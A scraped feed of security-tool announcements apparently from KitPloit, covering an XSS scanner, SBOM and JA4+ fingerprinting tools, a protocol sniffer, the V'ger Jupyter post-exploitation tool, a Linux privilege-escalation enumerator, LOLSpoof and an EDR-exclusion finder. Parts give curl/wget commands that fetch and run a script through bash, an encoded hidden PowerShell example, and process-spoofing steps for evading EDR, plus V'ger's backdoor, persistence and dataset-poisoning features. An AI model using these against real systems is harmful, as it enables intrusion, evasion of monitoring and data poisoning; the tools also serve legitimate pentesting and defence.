      • [x] slug - Transform your text to slug-case
      • [x] snake - Transform your text to snake_case
      • [x] title - Transform your text to Title Case
      • [x] upper - Transform your text to UPPER CASE

      Lines

      • [x] count-lines - Count the number of lines in your text
      • [x] reverse-lines - Reverse lines
      • [x] shuffle-lines - Shuffle lines randomly
      • [x] sort-lines - Sort lines alphabetically
      • [x] unique-lines - Get unique lines from list

      Spaces

      • [x] remove-spaces - Remove all spaces + new lines
      • [x] remove-newlines - Remove all new lines

      Count

      • [x] count-chars - Find the length of your text (including spaces)
      • [x] count-lines - Count the number of lines in your text
      • [x] count-words - Count the number of words in your text

      RGB/Hex

      • [x] hex-rgb - Convert a #hex-color code to RGB
      • [x] hex-encode - Encode your text Hex
      • [x] hex-decode - Convert Hexadecimal to String

      JSON

      • [x] json - Format your text as JSON
      • [x] json-escape - JSON Escape
      • [x] json-unescape - JSON Unescape
      • [x] json-yaml - Convert JSON to YAML text
      • [x] json-msgpack - Convert JSON to MSGPACK
      • [x] msgpack-json - Convert MSGPACK to JSON

      YAML

      • [x] yaml-json - Convert YAML to JSON text

      Markdown

      • [x] markdown-html - Convert Markdown to HTML

      Extract

      • [x] extract-emails - Extract emails from given text
      • [x] extract-ip - Extract IPv4 and IPv6 from your text
      • [x] extract-urls - Extract URls your text ( we don't do ping check )

      Other

      • [x] escape-quotes - escape single and double quotes from your text
      • [x] completion - generate the autocompletion script for the specified shell
      • [x] interactive - Use sttr in interactive mode
      • [x] version - Print the version of sttr
      • [x] zeropad - Pad a number with zeros
      • [x] and adding more....

      Featured On

      These are the few locations where sttr was highlighted, many thanks to all of you. Please feel free to add any blogs/videos you may have made that discuss sttr to the list.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      X-Recon - A Utility For Detecting Webpage Inputs And Conducting XSS Scans

      By: Zion3R β€” June 5th 2024 at 12:30

      A utility for identifying web page inputs and conducting XSS scanning.


      Features:

      • Subdomain Discovery:
      • Retrieves relevant subdomains for the target website and consolidates them into a whitelist. These subdomains can be utilized during the scraping process.

      • Site-wide Link Discovery:

      • Collects all links throughout the website based on the provided whitelist and the specified max_depth.

      • Form and Input Extraction:

      • Identifies all forms and inputs found within the extracted links, generating a JSON output. This JSON output serves as a foundation for leveraging the XSS scanning capability of the tool.

      • XSS Scanning:

      • Once the start recon option returns a custom JSON containing the extracted entries, the X-Recon tool can initiate the XSS vulnerability testing process and furnish you with the desired results!



      Note:

      The scanning functionality is currently inactive on SPA (Single Page Application) web applications, and we have only tested it on websites developed with PHP, yielding remarkable results. In the future, we plan to incorporate these features into the tool.




      Note:

      This tool maintains an up-to-date list of file extensions that it skips during the exploration process. The default list includes common file types such as images, stylesheets, and scripts (".css",".js",".mp4",".zip","png",".svg",".jpeg",".webp",".jpg",".gif"). You can customize this list to better suit your needs by editing the setting.json file..

      Installation

      $ git clone https://github.com/joshkar/X-Recon
      $ cd X-Recon
      $ python3 -m pip install -r requirements.txt
      $ python3 xr.py

      Target For Test:

      You can use this address in the Get URL section

        http://testphp.vulnweb.com


      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Startup-SBOM - A Tool To Reverse Engineer And Inspect The RPM And APT Databases To List All The Packages Along With Executables, Service And Versions

      By: Zion3R β€” June 3rd 2024 at 12:30


      This is a simple SBOM utility which aims to provide an insider view on which packages are getting executed.

      The process and objective is simple we can get a clear perspective view on the packages installed by APT (currently working on implementing this for RPM and other package managers). This is mainly needed to check which all packages are actually being executed.


      Installation

      The packages needed are mentioned in the requirements.txt file and can be installed using pip:

      pip3 install -r requirements.txt

      Usage

      • First of all install the packages.
      • Secondly , you need to set up environment variables such as:
        • Mount the image: Currently I am still working on a mechanism to automatically define a mount point and mount different types of images and volumes but its still quite a task for me.
      • Finally run the tool to list all the packages.
      Argument Description
      --analysis-mode Specifies the mode of operation. Default is static. Choices are static and chroot.
      --static-type Specifies the type of analysis for static mode. Required for static mode only. Choices are info and service.
      --volume-path Specifies the path to the mounted volume. Default is /mnt.
      --save-file Specifies the output file for JSON output.
      --info-graphic Specifies whether to generate visual plots for CHROOT analysis. Default is True.
      --pkg-mgr Manually specify the package manager or dont add this option for automatic check.
      APT:
      - Static Info Analysis:
      - This command runs the program in static analysis mode, specifically using the Info Directory analysis method.
      - It analyzes the packages installed on the mounted volume located at /mnt.
      - It saves the output in a JSON file named output.json.
      - It generates visual plots for CHROOT analysis.
      ```bash
      python3 main.py --pkg-mgr apt --analysis-mode static --static-type info --volume-path /mnt --save-file output.json
      ```
      • Static Service Analysis:

      • This command runs the program in static analysis mode, specifically using the Service file analysis method.

      • It analyzes the packages installed on the mounted volume located at /custom_mount.
      • It saves the output in a JSON file named output.json.
      • It does not generate visual plots for CHROOT analysis. bash python3 main.py --pkg-mgr apt --analysis-mode static --static-type service --volume-path /custom_mount --save-file output.json --info-graphic False

      • Chroot analysis with or without Graphic output:

      • This command runs the program in chroot analysis mode.
      • It analyzes the packages installed on the mounted volume located at /mnt.
      • It saves the output in a JSON file named output.json.
      • It generates visual plots for CHROOT analysis.
      • For graphical output keep --info-graphic as True else False bash python3 main.py --pkg-mgr apt --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False

      RPM - Static Analysis: - Similar to how its done on apt but there is only one type of static scan avaialable for now. bash python3 main.py --pkg-mgr rpm --analysis-mode static --volume-path /mnt --save-file output.json

      • Chroot analysis with or without Graphic output:
      • Exactly how its done on apt. bash python3 main.py --pkg-mgr rpm --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False

      Supporting Images

      Currently the tool works on Debian and Red Hat based images I can guarentee the debian outputs but the Red-Hat onces still needs work to be done its not perfect.

      I am working on the pacman side of things I am trying to find a relaiable way of accessing the pacman db for static analysis.

      Graphical Output Images (Chroot)

      APT Chroot

      RPM Chroot

      Inner Workings

      For the workings and process related documentation please read the wiki page: Link

      TODO

      • [x] Support for RPM
      • [x] Support for APT
      • [x] Support for Chroot Analysis
      • [x] Support for Versions
      • [x] Support for Chroot Graphical output
      • [x] Support for organized graphical output
      • [ ] Support for Pacman

      Ideas and Discussions

      Ideas regarding this topic are welcome in the discussions page.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      JA4+ - Suite Of Network Fingerprinting Standards

      By: Zion3R β€” May 25th 2024 at 12:30


      JA4+ is a suite of network FingerprintingΒ methods that are easy to use and easy to share. These methods are both human and machine readable to facilitate more effective threat-hunting and analysis. The use-cases for these fingerprints include scanning for threat actors, malware detection, session hijacking prevention, compliance automation, location tracking, DDoS detection, grouping of threat actors, reverse shell detection, and many more.

      Please read our blogs for details on how JA4+ works, why it works, and examples of what can be detected/prevented with it:
      JA4+ Network Fingerprinting (JA4/S/H/L/X/SSH)
      JA4T: TCP Fingerprinting (JA4T/TS/TScan)


      To understand how to read JA4+ fingerprints, see Technical Details

      This repo includes JA4+ Python, Rust, Zeek and C, as a Wireshark plugin.

      JA4/JA4+ support is being added to:
      GreyNoise
      Hunt
      Driftnet
      DarkSail
      Arkime
      GoLang (JA4X)
      Suricata
      Wireshark
      Zeek
      nzyme
      Netresec's CapLoader
      NetworkMiner">Netresec's NetworkMiner
      NGINX
      F5 BIG-IP
      nfdump
      ntop's ntopng
      ntop's nDPI
      Team Cymru
      NetQuest
      Censys
      Exploit.org's Netryx
      cloudflare.com/bots/concepts/ja3-ja4-fingerprint/">Cloudflare
      fastly
      with more to be announced...

      Examples

      Application JA4+ Fingerprints
      Chrome JA4=t13d1516h2_8daaf6152771_02713d6af862 (TCP)
      JA4=q13d0312h3_55b375c5d22e_06cda9e17597 (QUIC)
      JA4=t13d1517h2_8daaf6152771_b0da82dd1658 (pre-shared key)
      JA4=t13d1517h2_8daaf6152771_b1ff8ab2d16f (no key)
      IcedID Malware Dropper JA4H=ge11cn020000_9ed1ff1f7b03_cd8dafe26982
      IcedID Malware JA4=t13d201100_2b729b4bf6f3_9e7b989ebec8
      JA4S=t120300_c030_5e2616a54c73
      Sliver Malware JA4=t13d190900_9dc949149365_97f8aa674fd9
      JA4S=t130200_1301_a56c5b993250
      JA4X=000000000000_4f24da86fad6_bf0f0589fc03
      JA4X=000000000000_7c32fa18c13e_bf0f0589fc03
      Cobalt Strike JA4H=ge11cn060000_4e59edc1297a_4da5efaf0cbd
      JA4X=2166164053c1_2166164053c1_30d204a01551
      SoftEther VPN JA4=t13d880900_fcb5b95cb75a_b0d3b4ac2a14 (client)
      JA4S=t130200_1302_a56c5b993250
      JA4X=d55f458d5a6c_d55f458d5a6c_0fc8c171b6ae
      Qakbot JA4X=2bab15409345_af684594efb4_000000000000
      Pikabot JA4X=1a59268f55e5_1a59268f55e5_795797892f9c
      Darkgate JA4H=po10nn060000_cdb958d032b0
      LummaC2 JA4H=po11nn050000_d253db9d024b
      Evilginx JA4=t13d191000_9dc949149365_e7c285222651
      Reverse SSH Shell JA4SSH=c76s76_c71s59_c0s70
      Windows 10 JA4T=64240_2-1-3-1-1-4_1460_8
      Epson Printer JA4TScan=28960_2-4-8-1-3_1460_3_1-4-8-16

      For more, see ja4plus-mapping.csv
      The mapping file is unlicensed and free to use. Feel free to do a pull request with any JA4+ data you find.

      Plugins

      Wireshark
      Zeek
      Arkime

      Binaries

      Recommended to have tshark version 4.0.6 or later for full functionality. See: https://pkgs.org/search/?q=tshark

      Download the latest JA4 binaries from: Releases.

      JA4+ on Ubuntu

      sudo apt install tshark
      ./ja4 [options] [pcap]

      JA4+ on Mac

      1) Install Wireshark https://www.wireshark.org/download.html which will install tshark 2) Add tshark to $PATH

      ln -s /Applications/Wireshark.app/Contents/MacOS/tshark /usr/local/bin/tshark
      ./ja4 [options] [pcap]

      JA4+ on Windows

      1) Install Wireshark for Windows from https://www.wireshark.org/download.html which will install tshark.exe
      tshark.exe is at the location where wireshark is installed, for example: C:\Program Files\Wireshark\thsark.exe
      2) Add the location of tshark to your "PATH" environment variable in Windows.
      (System properties > Environment Variables... > Edit Path)
      3) Open cmd, navigate the ja4 folder

      ja4 [options] [pcap]

      Database

      An official JA4+ database of fingerprints, associated applications and recommended detection logic is in the process of being built.

      In the meantime, see ja4plus-mapping.csv

      Feel free to do a pull request with any JA4+ data you find.

      JA4+ Details

      JA4+ is a set of simple yet powerful network fingerprints for multiple protocols that are both human and machine readable, facilitating improved threat-hunting and security analysis. If you are unfamiliar with network fingerprinting, I encourage you to read my blogs releasing JA3 here, JARM here, and this excellent blog by Fastly on the State of TLS Fingerprinting which outlines the history of the aforementioned along with their problems. JA4+ brings dedicated support, keeping the methods up-to-date as the industry changes.

      All JA4+ fingerprints have an a_b_c format, delimiting the different sections that make up the fingerprint. This allows for hunting and detection utilizing just ab or ac or c only. If one wanted to just do analysis on incoming cookies into their app, they would look at JA4H_c only. This new locality-preserving format facilitates deeper and richer analysis while remaining simple, easy to use, and allowing for extensibility.

      For example; GreyNoise is an internet listener that identifies internet scanners and is implementing JA4+ into their product. They have an actor who scans the internet with a constantly changing single TLS cipher. This generates a massive amount of completely different JA3 fingerprints but with JA4, only the b part of the JA4 fingerprint changes, parts a and c remain the same. As such, GreyNoise can track the actor by looking at the JA4_ac fingerprint (joining a+c, dropping b).

      Current methods and implementation details:
      | Full Name | Short Name | Description | |---|---|---| | JA4 | JA4 | TLS Client Fingerprinting
      | JA4Server | JA4S | TLS Server Response / Session Fingerprinting | JA4HTTP | JA4H | HTTP Client Fingerprinting | JA4Latency | JA4L | Latency Measurment / Light Distance | JA4X509 | JA4X | X509 TLS Certificate Fingerprinting | JA4SSH | JA4SSH | SSH Traffic Fingerprinting | JA4TCP | JA4T | TCP Client Fingerprinting | JA4TCPServer | JA4TS | TCP Server Response Fingerprinting | JA4TCPScan | JA4TScan | Active TCP Fingerprint Scanner

      The full name or short name can be used interchangeably. Additional JA4+ methods are in the works...

      To understand how to read JA4+ fingerprints, see Technical Details

      Licensing

      JA4: TLS Client Fingerprinting is open-source, BSD 3-Clause, same as JA3. FoxIO does not have patent claims and is not planning to pursue patent coverage for JA4 TLS Client Fingerprinting. This allows any company or tool currently utilizing JA3 to immediately upgrade to JA4 without delay.

      JA4S, JA4L, JA4H, JA4X, JA4SSH, JA4T, JA4TScan and all future additions, (collectively referred to as JA4+) are licensed under the FoxIO License 1.1. This license is permissive for most use cases, including for academic and internal business purposes, but is not permissive for monetization. If, for example, a company would like to use JA4+ internally to help secure their own company, that is permitted. If, for example, a vendor would like to sell JA4+ fingerprinting as part of their product offering, they would need to request an OEM license from us.

      All JA4+ methods are patent pending.
      JA4+ is a trademark of FoxIO

      JA4+ can and is being implemented into open source tools, see the License FAQ for details.

      This licensing allows us to provide JA4+ to the world in a way that is open and immediately usable, but also provides us with a way to fund continued support, research into new methods, and the development of the upcoming JA4 Database. We want everyone to have the ability to utilize JA4+ and are happy to work with vendors and open source projects to help make that happen.

      ja4plus-mapping.csv is not included in the above software licenses and is thereby a license-free file.

      Q&A

      Q: Why are you sorting the ciphers? Doesn't the ordering matter?
      A: It does but in our research we've found that applications and libraries choose a unique cipher list more than unique ordering. This also reduces the effectiveness of "cipher stunting," a tactic of randomizing cipher ordering to prevent JA3 detection.

      Q: Why are you sorting the extensions?
      A: Earlier in 2023, Google updated Chromium browsers to randomize their extension ordering. Much like cipher stunting, this was a tactic to prevent JA3 detection and "make the TLS ecosystem more robust to changes." Google was worried server implementers would assume the Chrome fingerprint would never change and end up building logic around it, which would cause issues whenever Google went to update Chrome.

      So I want to make this clear: JA4 fingerprints will change as application TLS libraries are updated, about once a year. Do not assume fingerprints will remain constant in an environment where applications are updated. In any case, sorting the extensions gets around this and adding in Signature Algorithms preserves uniqueness.

      Q: Doesn't TLS 1.3 make fingerprinting TLS clients harder?
      A: No, it makes it easier! Since TLS 1.3, clients have had a much larger set of extensions and even though TLS1.3 only supports a few ciphers, browsers and applications still support many more.

      JA4+ was created by:

      John Althouse, with feedback from:

      Josh Atkins
      Jeff Atkinson
      Joshua Alexander
      W.
      Joe Martin
      Ben Higgins
      Andrew Morris
      Chris Ueland
      Ben Schofield
      Matthias Vallentin
      Valeriy Vorotyntsev
      Timothy Noel
      Gary Lipsky
      And engineers working at GreyNoise, Hunt, Google, ExtraHop, F5, Driftnet and others.

      Contact John Althouse at john@foxio.io for licensing and questions.

      Copyright (c) 2024, FoxIO



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Above - Invisible Network Protocol Sniffer

      By: Zion3R β€” May 22nd 2024 at 12:30


      Invisible protocol sniffer for finding vulnerabilities in the network. Designed for pentesters and security engineers.


      Above: Invisible network protocol sniffer
      Designed for pentesters and security engineers

      Author: Magama Bazarov, <caster@exploit.org>
      Pseudonym: Caster
      Version: 2.6
      Codename: Introvert

      Disclaimer

      All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.

      It is a specialized network security tool that helps both pentesters and security professionals.

      Mechanics

      Above is a invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it does not make any noise on the air. He's invisible. Completely based on the Scapy library.

      Above allows pentesters to automate the process of finding vulnerabilities in network hardware. Discovery protocols, dynamic routing, 802.1Q, ICS Protocols, FHRP, STP, LLMNR/NBT-NS, etc.

      Supported protocols

      Detects up to 27 protocols:

      MACSec (802.1X AE)
      EAPOL (Checking 802.1X versions)
      ARP (Passive ARP, Host Discovery)
      CDP (Cisco Discovery Protocol)
      DTP (Dynamic Trunking Protocol)
      LLDP (Link Layer Discovery Protocol)
      802.1Q Tags (VLAN)
      S7COMM (Siemens)
      OMRON
      TACACS+ (Terminal Access Controller Access Control System Plus)
      ModbusTCP
      STP (Spanning Tree Protocol)
      OSPF (Open Shortest Path First)
      EIGRP (Enhanced Interior Gateway Routing Protocol)
      BGP (Border Gateway Protocol)
      VRRP (Virtual Router Redundancy Protocol)
      HSRP (Host Standby Redundancy Protocol)
      GLBP (Gateway Load Balancing Protocol)
      IGMP (Internet Group Management Protocol)
      LLMNR (Link Local Multicast Name Resolution)
      NBT-NS (NetBIOS Name Service)
      MDNS (Multicast DNS)
      DHCP (Dynamic Host Configuration Protocol)
      DHCPv6 (Dynamic Host Configuration Protocol v6)
      ICMPv6 (Internet Control Message Protocol v6)
      SSDP (Simple Service Discovery Protocol)
      MNDP (MikroTik Neighbor Discovery Protocol)

      Operating Mechanism

      Above works in two modes:

      • Hot mode: Sniffing on your interface specifying a timer
      • Cold mode: Analyzing traffic dumps

      The tool is very simple in its operation and is driven by arguments:

      • Interface: Specifying the network interface on which sniffing will be performed
      • Timer: Time during which traffic analysis will be performed
      • Input: The tool takes an already prepared .pcap as input and looks for protocols in it
      • Output: Above will record the listened traffic to .pcap file, its name you specify yourself
      • Passive ARP: Detecting hosts in a segment using Passive ARP
      usage: above.py [-h] [--interface INTERFACE] [--timer TIMER] [--output OUTPUT] [--input INPUT] [--passive-arp]

      options:
      -h, --help show this help message and exit
      --interface INTERFACE
      Interface for traffic listening
      --timer TIMER Time in seconds to capture packets, if not set capture runs indefinitely
      --output OUTPUT File name where the traffic will be recorded
      --input INPUT File name of the traffic dump
      --passive-arp Passive ARP (Host Discovery)

      Information about protocols

      The information obtained will be useful not only to the pentester, but also to the security engineer, he will know what he needs to pay attention to.

      When Above detects a protocol, it outputs the necessary information to indicate the attack vector or security issue:

      • Impact: What kind of attack can be performed on this protocol;

      • Tools: What tool can be used to launch an attack;

      • Technical information: Required information for the pentester, sender MAC/IP addresses, FHRP group IDs, OSPF/EIGRP domains, etc.

      • Mitigation: Recommendations for fixing the security problems

      • Source/Destination Addresses: For protocols, Above displays information about the source and destination MAC addresses and IP addresses


      Installation

      Linux

      You can install Above directly from the Kali Linux repositories

      caster@kali:~$ sudo apt update && sudo apt install above

      Or...

      caster@kali:~$ sudo apt-get install python3-scapy python3-colorama python3-setuptools
      caster@kali:~$ git clone https://github.com/casterbyte/Above
      caster@kali:~$ cd Above/
      caster@kali:~/Above$ sudo python3 setup.py install

      macOS:

      # Install python3 first
      brew install python3
      # Then install required dependencies
      sudo pip3 install scapy colorama setuptools

      # Clone the repo
      git clone https://github.com/casterbyte/Above
      cd Above/
      sudo python3 setup.py install

      Don't forget to deactivate your firewall on macOS!

      Settings > Network > Firewall


      How to Use

      Hot mode

      Above requires root access for sniffing

      Above can be run with or without a timer:

      caster@kali:~$ sudo above --interface eth0 --timer 120

      To stop traffic sniffing, press CTRL + Π‘

      WARNING! Above is not designed to work with tunnel interfaces (L3) due to the use of filters for L2 protocols. Tool on tunneled L3 interfaces may not work properly.

      Example:

      caster@kali:~$ sudo above --interface eth0 --timer 120

      -----------------------------------------------------------------------------------------
      [+] Start sniffing...

      [*] After the protocol is detected - all necessary information about it will be displayed
      --------------------------------------------------
      [+] Detected SSDP Packet
      [*] Attack Impact: Potential for UPnP Device Exploitation
      [*] Tools: evil-ssdp
      [*] SSDP Source IP: 192.168.0.251
      [*] SSDP Source MAC: 02:10:de:64:f2:34
      [*] Mitigation: Ensure UPnP is disabled on all devices unless absolutely necessary, monitor UPnP traffic
      --------------------------------------------------
      [+] Detected MDNS Packet
      [*] Attack Impact: MDNS Spoofing, Credentials Interception
      [*] Tools: Responder
      [*] MDNS Spoofing works specifically against Windows machines
      [*] You cannot get NetNTLMv2-SSP from Apple devices
      [*] MDNS Speaker IP: fe80::183f:301c:27bd:543
      [*] MDNS Speaker MAC: 02:10:de:64:f2:34
      [*] Mitigation: Filter MDNS traffic. Be careful with MDNS filtering
      --------------------------------------------------

      If you need to record the sniffed traffic, use the --output argument

      caster@kali:~$ sudo above --interface eth0 --timer 120 --output above.pcap

      If you interrupt the tool with CTRL+C, the traffic is still written to the file

      Cold mode

      If you already have some recorded traffic, you can use the --input argument to look for potential security issues

      caster@kali:~$ above --input ospf-md5.cap

      Example:

      caster@kali:~$ sudo above --input ospf-md5.cap

      [+] Analyzing pcap file...

      --------------------------------------------------
      [+] Detected OSPF Packet
      [+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
      [*] Tools: Loki, Scapy, FRRouting
      [*] OSPF Area ID: 0.0.0.0
      [*] OSPF Neighbor IP: 10.0.0.1
      [*] OSPF Neighbor MAC: 00:0c:29:dd:4c:54
      [!] Authentication: MD5
      [*] Tools for bruteforce: Ettercap, John the Ripper
      [*] OSPF Key ID: 1
      [*] Mitigation: Enable passive interfaces, use authentication
      --------------------------------------------------
      [+] Detected OSPF Packet
      [+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
      [*] Tools: Loki, Scapy, FRRouting
      [*] OSPF Area ID: 0.0.0.0
      [*] OSPF Neighbor IP: 192.168.0.2
      [*] OSPF Neighbor MAC: 00:0c:29:43:7b:fb
      [!] Authentication: MD5
      [*] Tools for bruteforce: Ettercap, John the Ripper
      [*] OSPF Key ID: 1
      [*] Mitigation: Enable passive interfaces, use authentication

      Passive ARP

      The tool can detect hosts without noise in the air by processing ARP frames in passive mode

      caster@kali:~$ sudo above --interface eth0 --passive-arp --timer 10

      [+] Host discovery using Passive ARP

      --------------------------------------------------
      [+] Detected ARP Reply
      [*] ARP Reply for IP: 192.168.1.88
      [*] MAC Address: 00:00:0c:07:ac:c8
      --------------------------------------------------
      [+] Detected ARP Reply
      [*] ARP Reply for IP: 192.168.1.40
      [*] MAC Address: 00:0c:29:c5:82:81
      --------------------------------------------------

      Outro

      I wrote this tool because of the track "A View From Above (Remix)" by KOAN Sound. This track was everything to me when I was working on this sniffer.




      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Vger - An Interactive CLI Application For Interacting With Authenticated Jupyter Instances

      By: Zion3R β€” May 21st 2024 at 12:30

      V'ger is an interactive command-line application for post-exploitation of authenticated Jupyter instances with a focus on AI/ML security operations.

      User Stories

      • As a Red Teamer, you've found Jupyter credentials, but don't know what you can do with them. V'ger is organized in a format that should be intuitive for most offensive security professionals to help them understand the functionality of the target Jupyter server.
      • As a Red Teamer, you know that some browser-based actions will be visibile to the legitimate Jupyter users. For example, modifying tabs will appear in their workspace and commands entered in cells will be recorded to the history. V'ger decreases the likelihood of detection.
      • As an AI Red Teamer, you understand academic algorthmic attacks, but need a more practical execution vector. For instance, you may need to modify a large, foundational internet-scale dataset as part of a model poisoning operation. Modifying that dataset at its source may be impossible or generate undesirable auditable artifacts. with V'ger you can achieve the same objectives in-memory, a significant improvement in tradecraft.
      • As a Blue Teamer, you want to understand logging and visibility into a live Jupyter deployment. V'ger can help you generate repeatable artifacts for testing instrumentation and performing incident response exercises.

      Usage

      Initial Setup

      1. pip install vger
      2. vger --help

      Currently, vger interactive has maximum functionality, maintaining state for discovered artifacts and recurring jobs. However, most functionality is also available by-name in non-interactive format with vger <module>. List available modules with vger --help.

      Commands

      Once a connection is established, users drop into a nested set of menus.

      The top level menu is: - Reset: Configure a different host. - Enumerate: Utilities to learn more about the host. - Exploit: Utilities to perform direct action and manipulation of the host and artifacts. - Persist: Utilities to establish persistence mechanisms. - Export: Save output to a text file. - Quit: No one likes quitters.

      These menus contain the following functionality: - List modules: Identify imported modules in target notebooks to determine what libraries are available for injected code. - Inject: Execute code in the context of the selected notebook. Code can be provided in a text editor or by specifying a local .py file. Either input is processed as a string and executed in runtime of the notebook. - Backdoor: Launch a new JupyterLab instance open to 0.0.0.0, with allow-root on a user-specified port with a user-specified password. - Check History: See ipython commands recently run in the target notebook. - Run shell command: Spawn a terminal, run the command, return the output, and delete the terminal. - List dir or get file: List directories relative to the Jupyter directory. If you don't know, start with /. - Upload file: Upload file from localhost to the target. Specify paths in the same format as List dir (relative to the Jupyter directory). Provide a full path including filename and extension. - Delete file: Delete a file. Specify paths in the same format as List dir (relative to the Jupyter directory). - Find models: Find models based on common file formats. - Download models: Download discovered models. - Snoop: Monitor notebook execution and results until timeout. - Recurring jobs: Launch/Kill recurring snippets of code silently run in the target environment.

      Experimental

      With pip install vger[ai] you'll get LLM generated summaries of notebooks in the target environment. These are meant to be rough translation for non-DS/AI folks to do quick triage of if (or which) notebooks are worth investigating further.

      There was an inherent tradeoff on model size vs. ability and that's something I'll continue to tinker with, but hopefully this is helpful for some more traditional security users. I'd love to see folks start prompt injecting their notebooks ("these are not the droids you're looking for").

      Examples



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Linux-Smart-Enumeration - Linux Enumeration Tool For Pentesting And CTFs With Verbosity Levels

      By: Zion3R β€” May 19th 2024 at 00:42


      First, a couple of useful oneliners ;)

      wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh
      curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

      Note that since version 2.10 you can serve the script to other hosts with the -S flag!


      linux-smart-enumeration

      Linux enumeration tools for pentesting and CTFs

      This project was inspired by https://github.com/rebootuser/LinEnum and uses many of its tests.

      Unlike LinEnum, lse tries to gradualy expose the information depending on its importance from a privesc point of view.

      What is it?

      This shell script will show relevant information about the security of the local Linux system, helping to escalate privileges.

      From version 2.0 it is mostly POSIX compliant and tested with shellcheck and posh.

      It can also monitor processes to discover recurrent program executions. It monitors while it is executing all the other tests so you save some time. By default it monitors during 1 minute but you can choose the watch time with the -p parameter.

      It has 3 levels of verbosity so you can control how much information you see.

      In the default level you should see the highly important security flaws in the system. The level 1 (./lse.sh -l1) shows interesting information that should help you to privesc. The level 2 (./lse.sh -l2) will just dump all the information it gathers about the system.

      By default it will ask you some questions: mainly the current user password (if you know it ;) so it can do some additional tests.

      How to use it?

      The idea is to get the information gradually.

      First you should execute it just like ./lse.sh. If you see some green yes!, you probably have already some good stuff to work with.

      If not, you should try the level 1 verbosity with ./lse.sh -l1 and you will see some more information that can be interesting.

      If that does not help, level 2 will just dump everything you can gather about the service using ./lse.sh -l2. In this case you might find useful to use ./lse.sh -l2 | less -r.

      You can also select what tests to execute by passing the -s parameter. With it you can select specific tests or sections to be executed. For example ./lse.sh -l2 -s usr010,net,pro will execute the test usr010 and all the tests in the sections net and pro.

      Use: ./lse.sh [options]

      OPTIONS
      -c Disable color
      -i Non interactive mode
      -h This help
      -l LEVEL Output verbosity level
      0: Show highly important results. (default)
      1: Show interesting results.
      2: Show all gathered information.
      -s SELECTION Comma separated list of sections or tests to run. Available
      sections:
      usr: User related tests.
      sud: Sudo related tests.
      fst: File system related tests.
      sys: System related tests.
      sec: Security measures related tests.
      ret: Recurren tasks (cron, timers) related tests.
      net: Network related tests.
      srv: Services related tests.
      pro: Processes related tests.
      sof: Software related tests.
      ctn: Container (docker, lxc) related tests.
      cve: CVE related tests.
      Specific tests can be used with their IDs (i.e.: usr020,sud)
      -e PATHS Comma separated list of paths to exclude. This allows you
      to do faster scans at the cost of completeness
      -p SECONDS Time that the process monitor will spend watching for
      processes. A value of 0 will disable any watch (default: 60)
      -S Serve the lse.sh script in this host so it can be retrieved
      from a remote host.

      Is it pretty?

      Usage demo

      Also available in webm video


      Level 0 (default) output sample


      Level 1 verbosity output sample


      Level 2 verbosity output sample


      Examples

      Direct execution oneliners

      bash <(wget -q -O - "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l2 -i
      bash <(curl -s "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l1 -i


      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      LOLSpoof - An Interactive Shell To Spoof Some LOLBins Command Line

      By: Zion3R β€” May 11th 2024 at 12:30


      LOLSpoof is a an interactive shell program that automatically spoof the command line arguments of the spawned process. Just call your incriminate-looking command line LOLBin (e.g. powershell -w hidden -enc ZwBlAHQALQBwAHIAbwBjAGUA....) and LOLSpoof will ensure that the process creation telemetry appears legitimate and clear.


      Why

      Process command line is a very monitored telemetry, being thoroughly inspected by AV/EDRs, SOC analysts or threat hunters.

      How

      1. Prepares the spoofed command line out of the real one: lolbin.exe " " * sizeof(real arguments)
      2. Spawns that suspended LOLBin with the spoofed command line
      3. Gets the remote PEB address
      4. Gets the address of RTL_USER_PROCESS_PARAMETERS struct
      5. Gets the address of the command line unicode buffer
      6. Overrides the fake command line with the real one
      7. Resumes the main thread

      Opsec considerations

      Although this simple technique helps to bypass command line detection, it may introduce other suspicious telemetry: 1. Creation of suspended process 2. The new process has trailing spaces (but it's really easy to make it a repeated character or even random data instead) 3. Write to the spawned process with WriteProcessMemory

      Build

      Built with Nim 1.6.12 (compiling with Nim 2.X yields errors!)

      nimble install winim

      Known issue

      Programs that clear or change the previous printed console messages (such as timeout.exe 10) breaks the program. when such commands are employed, you'll need to restart the console. Don't know how to fix that, open to suggestions.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      BadExclusionsNWBO - An Evolution From BadExclusions To Identify Folder Custom Or Undocumented Exclusions On AV/EDR

      By: Zion3R β€” May 9th 2024 at 12:30


      BadExclusionsNWBO is an evolution from BadExclusions to identify folder custom or undocumented exclusions on AV/EDR.

      How it works?

      BadExclusionsNWBO copies and runs Hook_Checker.exe in all folders and subfolders of a given path. You need to have Hook_Checker.exe on the same folder of BadExclusionsNWBO.exe.

      Hook_Checker.exe returns the number of EDR hooks. If the number of hooks is 7 or less means folder has an exclusion otherwise the folder is not excluded.


      Original idea?

      Since the release of BadExclusions I've been thinking on how to achieve the same results without creating that many noise. The solution came from another tool, https://github.com/asaurusrex/Probatorum-EDR-Userland-Hook-Checker.

      If you download Probatorum-EDR-Userland-Hook-Checker and you run it inside a regular folder and on folder with an specific type of exclusion you will notice a huge difference. All the information is on the Probatorum repository.

      Requirements

      Each vendor apply exclusions on a different way. In order to get the list of folder exclusions an specific type of exclusion should be made. Not all types of exclusion and not all the vendors remove the hooks when they exclude a folder.

      The user who runs BadExclusionsNWBO needs write permissions on the excluded folder in order to write Hook_Checker file and get the results.

      EDR Demo

